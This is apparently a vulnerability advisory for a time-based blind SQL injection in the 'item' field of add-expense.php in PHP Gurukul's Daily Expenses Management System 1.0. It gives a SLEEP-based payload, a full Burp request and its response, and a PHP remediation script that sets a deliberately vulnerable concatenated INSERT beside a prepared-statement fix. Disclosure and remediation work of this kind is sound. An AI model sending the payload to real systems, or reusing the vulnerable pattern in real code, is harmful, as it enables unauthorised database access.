Exploit Title: Daily Expenses Management System 1.0 - 'item' SQL Injection (Time-based blind)

Description:

Daily Expenses Management System version 1.0, developed by PHP Gurukul, contains a time-based blind SQL injection vulnerability in the 'add-expense.php' page. The 'item' parameter of the POST request reaches the backend database unsanitized, so an attacker can execute arbitrary SQL commands. Because the page returns no query output, the injection is confirmed by submitting a crafted query that makes the database perform a time-consuming operation and observing the delay in the server's response.


Feature: Add Expenses

  • Vulnerable file: add-expense.php
  • Vulnerable parameters:
    • item
    • costitem

PoC


Payload

dateexpense=1337-11-11&item=1' AND (SELECT 8429 FROM (SELECT(SLEEP(5)))IWeV) AND 'hmPP'='hmPP&costitem=2&submit=

Burp Suite request

POST /dets/add-expense.php HTTP/1.1
Host: example.com
Content-Length: 139
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://example.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://example.com/dets/add-expense.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,hi;q=0.8
Cookie: PHPSESSID=ofjno6jio72kc9u6tnbvu1cit7
Connection: close

dateexpense=2024-03-12&item=1%27+AND+%28SELECT+8429+FROM+%28SELECT%28SLEEP%285%29%29%29IWeV%29+AND+%27hmPP%27%3D%27hmPP&costitem=10&submit=

Burp Suite response

HTTP/1.1 200 OK
Date: Wed, 13 Mar 2024 00:10:39 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Powered-By: PHP/8.0.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6455
Connection: close
Content-Type: text/html; charset=UTF-8

<script>alert('Expense has been added');</script><script>window.location.href='manage-expense.php'</script><!DOCTYPE html>
<html>
<head>
...
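Remediation

The following script is an added example, not part of the original advisory and not PHP Gurukul's code. It reconstructs the assumed pattern behind the finding (POST values concatenated into the INSERT issued by add-expense.php) beside a prepared-statement fix, using the 'item' payload from the PoC above; the table and column names are assumptions, and an in-memory SQLite database stands in for MySQL so it runs offline.

```php
<?php
// Added example, not PHP Gurukul's code. Reconstructs the assumed pattern behind
// the finding (POST values spliced into the INSERT issued by add-expense.php)
// beside a prepared-statement fix. Table and column names are assumptions; an
// in-memory SQLite database stands in for MySQL so the script runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE tblexpense (id INTEGER PRIMARY KEY, dateexpense TEXT, item TEXT, costitem REAL)');

// The 'item' value from the PoC request, URL-decoded.
$item = "1' AND (SELECT 8429 FROM (SELECT(SLEEP(5)))IWeV) AND 'hmPP'='hmPP";
$date = '2024-03-12';
$cost = '10';

// Assumed vulnerable pattern: request values interpolated into the SQL text.
function addExpenseVulnerable(PDO $pdo, string $date, string $item, string $cost): void
{
    $sql = "INSERT INTO tblexpense (dateexpense, item, costitem) VALUES ('$date', '$item', '$cost')";
    $pdo->exec($sql);
}

// Hardened version: bound parameters keep the payload as data, and the two
// non-free-text fields are validated before they reach the query.
function addExpenseSafe(PDO $pdo, string $date, string $item, string $cost): void
{
    if (!preg_match('/^\d{4}-\d{2}-\d{2}$/', $date) || !is_numeric($cost)) {
        throw new InvalidArgumentException('invalid dateexpense or costitem');
    }
    $stmt = $pdo->prepare('INSERT INTO tblexpense (dateexpense, item, costitem) VALUES (?, ?, ?)');
    $stmt->execute([$date, $item, (float) $cost]);
}

try {
    addExpenseVulnerable($pdo, $date, $item, $cost);
} catch (PDOException $e) {
    // SQLite has no SLEEP(), so it rejects the statement: the error shows the
    // injected text was parsed as SQL. MySQL would evaluate it and stall for
    // 5 seconds, which is the delay the PoC relies on.
    echo "vulnerable: injected SQL reached the engine (" . $e->getMessage() . ")\n";
}

addExpenseSafe($pdo, $date, $item, $cost);
$stored = $pdo->query('SELECT item FROM tblexpense')->fetchColumn();
// The whole payload is stored verbatim as the item name; nothing was executed.
echo "safe: stored item = " . $stored . "\n";
```

Run with `php` and the pdo_sqlite extension; the same `prepare`/`execute` shape applies unchanged to a MySQL PDO or mysqli connection.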